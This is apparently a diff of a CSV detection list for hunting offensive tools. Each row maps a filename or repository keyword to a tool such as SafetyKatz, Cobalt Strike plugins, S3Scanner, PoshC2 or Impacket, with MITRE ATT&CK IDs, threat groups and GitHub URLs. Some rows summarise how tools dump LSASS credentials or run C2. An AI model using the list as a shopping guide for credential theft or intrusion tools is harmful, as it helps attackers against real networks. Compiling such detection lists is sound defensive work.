- TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" @@ -16092,37 +16274,37 @@ "*rxwx/cs-rdll-ipc-example*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*s0lst1c3*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/s0lst1c3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*s0md3v*","offensive_tool_keyword","Github Username","github username hosting offensive tools. mostly for web hacking","N/A","N/A","N/A","N/A","Web Attacks","https://github.com/s0md3v","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*s0md3v*Striker*","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2114","454","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z" +"*s0md3v*Striker*","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2116","454","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z" "*S12cybersecurity/Admin2Sys*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*S12cybersecurity/RDPCredentialStealer*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*S3cretP4ssw0rd!*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*S3cur3Th1sSh1t*","offensive_tool_keyword","Github Username","Github username of hackr known for exploitation scripts Pentesting. scripting and pwning!","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*S3cur3Th1sSh1t/MultiPotato*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*S3cur3Th1sSh1t/PowerSharpPack*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*s3scanner -*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" -"*s3scanner dump *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" -"*s3scanner scan *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" -"*S3Scanner-master*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*S3cur3Th1sSh1t/PowerSharpPack*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*s3scanner -*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*s3scanner dump *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*s3scanner scan *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*S3Scanner-master*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "*S4U2self.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*S4uDelegator.*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*S4UTomato 1.0.0-beta*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" -"*S4UTomato.csproj*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" -"*S4UTomato.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" -"*S4UTomato.sln*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" -"*S4UTomato-master*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato 1.0.0-beta*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.csproj*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.sln*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato-master*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*s7scan*","offensive_tool_keyword","Github Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","2","121","45","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z" -"*sa7mon/S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" -"*safari_in_operator_side_effect.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*safari_proxy_object_type_confusion.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*sa7mon/S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*safari_in_operator_side_effect.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*safari_proxy_object_type_confusion.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SafeBreach-Labs/EDRaser*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" -"*safetydump*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*safetydump*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*SafetyKatz.csproj*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*SafetyKatz.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*SafetyKatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*SafetyKatz.exe*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" -"*SafetyKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SafetyKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SafetyKatz.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SafetyKatz.sln*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*safetykatz.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -16132,7 +16314,7 @@ "*Salsa-tools*","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","6","564","140","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z" "*sam_the_admin.py*","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*SamAdduser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" -"*sambaPipe.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*sambaPipe.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*samdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*samdump.py*","offensive_tool_keyword","deimosc2","DeimosC2 is a 